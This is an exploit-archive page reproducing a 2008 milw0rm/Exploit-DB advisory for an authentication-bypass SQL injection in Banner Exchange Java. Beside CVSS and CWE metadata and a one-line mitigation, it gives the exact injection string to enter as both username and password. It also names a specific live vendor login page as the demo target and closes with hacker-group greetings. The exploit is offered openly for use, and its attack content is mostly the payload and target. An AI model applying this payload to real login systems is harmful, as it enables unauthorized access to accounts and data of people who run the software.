header-logo
Suggest Exploit
vendor:
Banner Exchange Java
by:
Y3d D3v!L
8.5
CVSS
HIGH
Auth Bypass
89
CWE
Product Name: Banner Exchange Java
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: a:adserversolutions:banner_exchange_java
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Remote SQL Injection Vulnerability

A remote SQL injection vulnerability exists in Banner Exchange Java, allowing an attacker to bypass authentication by sending the username and password as 'r0' or '1=1--'

Mitigation:

Ensure that user input is properly sanitized and validated before being used in SQL queries.
Source

Exploit-DB raw data:

[☢] ☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢{بسم الله الرحمن الرحيم}☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢

 [~]Tybe:(Auth Bypass) Remote SQL Injection Vulnerability
   
 [~]Vendor: www.adserversolutions.com
   
 [~]Software: Banner Exchange Java 
   
 [~]author: ((я3d D3v!L))
   
 [~] Date: 28.11.2008
   
 [~] Home: www.ahacker.biz
   
 [~] contact: N/A

[~]☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠{R0}☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠
   
 [~] Exploit:
   
 [~] username: r0' or ' 1=1--
 [~] password: r0' or ' 1=1--
   
   
 [☠]login 4 d3m0:
   
  www.adservingsolutions.com/xchange_java/logon_license.jsp
 
 [~]-----------------------------{str0ke}---------------------------------------------------
 
  [~] Greetz tO: {str0ke} & maxmos & EV!L KS@ & hesham_hacker & K374 & /\/\4/\/0/\/
  [~]
  [~] spechial thanks : dolly & 7am3m & EL z0hery & BLACK R053 &{str0ke}
  [~]
  [~] EV!L !NS!D3 734M --- R3d-D3v!L--EXOT!C --poison scorbion --samakiller
  [~]
  [~] xp10.biz & ahacker.biz
  [~]
 
 [~]--------------------------------------------------------------------------------

# milw0rm.com [2008-12-11]

Navigation

Suggest Exploit

Services By CQR